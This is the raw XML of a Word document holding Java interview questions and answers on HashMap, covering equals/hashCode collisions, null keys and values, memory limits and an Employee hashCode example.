        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="172" w:name="_Toc197867386"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What if equals() returns true for two keys with same hashCode()</w:t>
      </w:r>
      <w:r w:rsidR="00127D9B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="172"/>
    </w:p>
    <w:p w14:paraId="5C28A7B2" w14:textId="07AF5B45" w:rsidR="00127D9B" w:rsidRPr="00CE4B95" w:rsidRDefault="005867E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it replaces the old value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34420265" w14:textId="77777777" w:rsidR="00DB7EDC" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB7EDC" w:rsidP="00DB7EDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4491551B"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67ACC92"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content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0006B5C4"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77C09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9238CDD"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key (based on equals), replaces value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DFCA0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EBE2C2" w14:textId="23BF4959"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00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C3070" w14:textId="77777777" w:rsidR="005867E7" w:rsidRPr="00CE4B95" w:rsidRDefault="005867E7" w:rsidP="00DB7EDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1352DAD7" w14:textId="77777777" w:rsidR="00CE6FA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CE6FA6" w:rsidP="00CE6FA6">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CE4B95" w14:paraId="63AD2745" w14:textId="77777777" w:rsidTr="00CE6FA6">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CA220BA"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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22CE695F"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Behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE6FA6" w:rsidRPr="00CE4B95" w14:paraId="4E37BE04" w14:textId="77777777" w:rsidTr="00CE6FA6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04C8600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hashCode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1618BDD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Goes to same bucket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE6FA6" w:rsidRPr="00CE4B95" w14:paraId="5BFFCAA4" w14:textId="77777777" w:rsidTr="00CE6FA6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B81824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Different equals</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="426FF466"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tored as different keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE6FA6" w:rsidRPr="00CE4B95" w14:paraId="4535B049" w14:textId="77777777" w:rsidTr="00CE6FA6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F0DCA6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equals</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F1A763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Treated as same key, old value replaced</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE6FA6" w:rsidRPr="00CE4B95" w14:paraId="57BA5C89" w14:textId="77777777" w:rsidTr="00CE6FA6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37B8C2FA"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Internal DS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="461CBE39"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Array + Linked List / Tree (Java 8+) to handle collisions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D5B54AF" w14:textId="76BF2816" w:rsidR="00CE6FA6"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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE0F5F9" w14:textId="77777777" w:rsidR="00DB7EDC" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB7EDC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="173" w:name="_Toc197867387"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Can we store null value in HashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="173"/>
    </w:p>
    <w:p w14:paraId="6C93F05A" w14:textId="3E29C7D6" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="00F20F31">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store null values in a HashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02789A1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break it down:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BC45AF"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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCA48E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 Key and Null Value in HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375BC034"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Key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E94F2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exactly one null key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728E50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01F7E50"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p>
    <w:p w14:paraId="60795BE7" w14:textId="085E2E08"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KeyValue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A97343"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Values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB7A32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multiple keys to be mapped to null values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3707ACF1"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C8275A3"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1F4E631D" w14:textId="4248F5B1"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NullKeyValue, key1=null, key2=null}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B2A695"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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AD6650"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 Careful:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273AF02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CE4B95" w14:paraId="742051A2" w14:textId="77777777" w:rsidTr="001E1C7C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B1B7032"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Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w14:paraId="1EF54787" w14:textId="77777777" w:rsidTr="001E1C7C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16E8B6D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361CF173" w14:textId="77777777" w:rsidTr="001E1C7C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42C5D08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6F011FE9" w14:textId="77777777" w:rsidTr="001E1C7C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F678DA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200F8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me cases)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w14:paraId="0AC08DCB" w14:textId="77777777" w:rsidTr="001E1C7C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19321460"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678FE4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E1C7C" w:rsidRPr="00CE4B95" w14:paraId="5EF6FD81" w14:textId="77777777" w:rsidTr="001E1C7C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="180C529B"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8DE0D3"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44682BA2"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36" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5EC3A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y is only one null key allowed?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D85141F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F32497"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CF91C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specially</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A61DD51" w14:textId="105847F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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5848FFA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37" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB64609"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4" w:name="_Toc197867388"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we store infinite data in a HashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="174"/>
    </w:p>
    <w:p w14:paraId="7AC2BBE7" w14:textId="15C1E6FF" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="00C523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we cannot store infinite data in a HashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAF81A9"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38" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEBB3AF"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mitations That Prevent Infinite Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5919F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Limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0845E6F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iggest constraint is available heap memory (RAM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBA10C1"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entry (key + value + Node overhead) consumes memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0921AE7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heap space is exhausted, you'll get an:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2FC7EA" w14:textId="34CD315E"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="0000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a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OfMemory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ava</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> heap space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA660B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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Array Size Limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD8F0D2"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 an array to store buckets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009B85CE"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Pr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17B2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6968D752" w14:textId="424C7593"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GC Overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76195A6D"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hashing Overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C5D81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en the size exceeds the threshold (capacity * loadFactor), HashMap resizes and rehashes — an expensive operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FF80FC"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39" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="600417D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2F3C59C"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F0EDE8"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E3970E"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D392E02" w14:textId="23ACA554"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6600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABB513A" w14:textId="132A9F44"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eventually crash with:</w:t>
      </w:r>
      <w:r w:rsidR="00F90BBD"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t>Exception in thread "main" java.lang.OutOfMemoryError: Java heap space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F282191"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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="419CAF7D"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330512F8"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ways design HashMap usage with estimated size and memory in mind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B595A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itialCapacity wisely to reduce rehashing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310AD094" w14:textId="08F3C378"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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expected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adFactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60156E76" w14:textId="0772BB83" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95"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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7109FE33"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5" w:name="_Toc197867389"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we access null value in HashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="175"/>
    </w:p>
    <w:p w14:paraId="08648B48" w14:textId="18472F48" w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w:rsidRDefault="005F3D18" w:rsidP="009A19CE">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access a null value from a HashMap just like any other value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143FF85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it down clearly </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>👇</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7527CBE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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C5EE4E"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ccessing a null value in a HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560E0F0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4641C9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A8E56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49A12"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78A9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9CABD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78D03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y with null value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D88C8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ll key with value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0894A41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68AA6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5EF2C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KeyValue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0894E50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233FD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38478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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1C76C2"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CE4B95" w14:paraId="22B09E89" w14:textId="77777777" w:rsidTr="005F3D18">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0804C839"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5F3D18" w:rsidRPr="00CE4B95" w14:paraId="773D6CAF" w14:textId="77777777" w:rsidTr="005F3D18">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CBEB181"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actual value is null)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w14:paraId="021446FA" w14:textId="77777777" w:rsidTr="005F3D18">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A7F75B5"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key doesn't exist)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5EF38410"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Distinction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1E5034"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ap.get(key) returns null, you can't tell directly if:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F7A51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exists and value is null, or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8476A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doesn't exist at all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C80F8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ndle that, use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165A34F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AD9FE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exists with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p>
    <w:p w14:paraId="28DC03B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6353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does not exist."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2DAC5B" w14:textId="7BE96FE6"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88013" w14:textId="3E7C90F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CE4B95" w14:paraId="20EE03D4" w14:textId="77777777" w:rsidTr="005F3D18">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48A5FED1"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swer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w14:paraId="6ACD58BD" w14:textId="77777777" w:rsidTr="005F3D18">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66158CC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BF4EC06" w14:textId="77777777" w:rsidTr="005F3D18">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62D231C2"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A6A01F3" w14:textId="77777777" w:rsidTr="005F3D18">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E0F65F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same as if value is null)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F3D18" w:rsidRPr="00CE4B95" w14:paraId="6BBA9B23" w14:textId="77777777" w:rsidTr="005F3D18">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FD97416"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 to differentiate?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74473B4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tainsKey(key)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1EBA8589" w14:textId="3F777A35" w:rsidR="005F3D18" w:rsidRPr="00CE4B95"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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE07314" w14:textId="77777777" w:rsidR="00D9071D" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9071D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="176" w:name="_Toc197867390"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How hashcode calculations happened on the Employee object?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="176"/>
    </w:p>
    <w:p w14:paraId="179A1CD1" w14:textId="4D1B6658" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB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Code() is Calculated for the Employee Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D48A7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Calculate hashCode() for an Employee Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C94704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hashCode() can be implemented for an Employee object:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2812A6BE"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Code() Calculation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E938F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2DF9EDB4" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6820E08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5052F94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1A320F4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D801120" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="051DAA4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5E1B363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int id, String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FBF1E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607C633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F8151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4D1B52" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F1DF31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1B031B6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13E65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1CDA1F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id, name);  // A simple way to calculate hashCode using multiple fields</w:t>
      </w:r>
    </w:p>
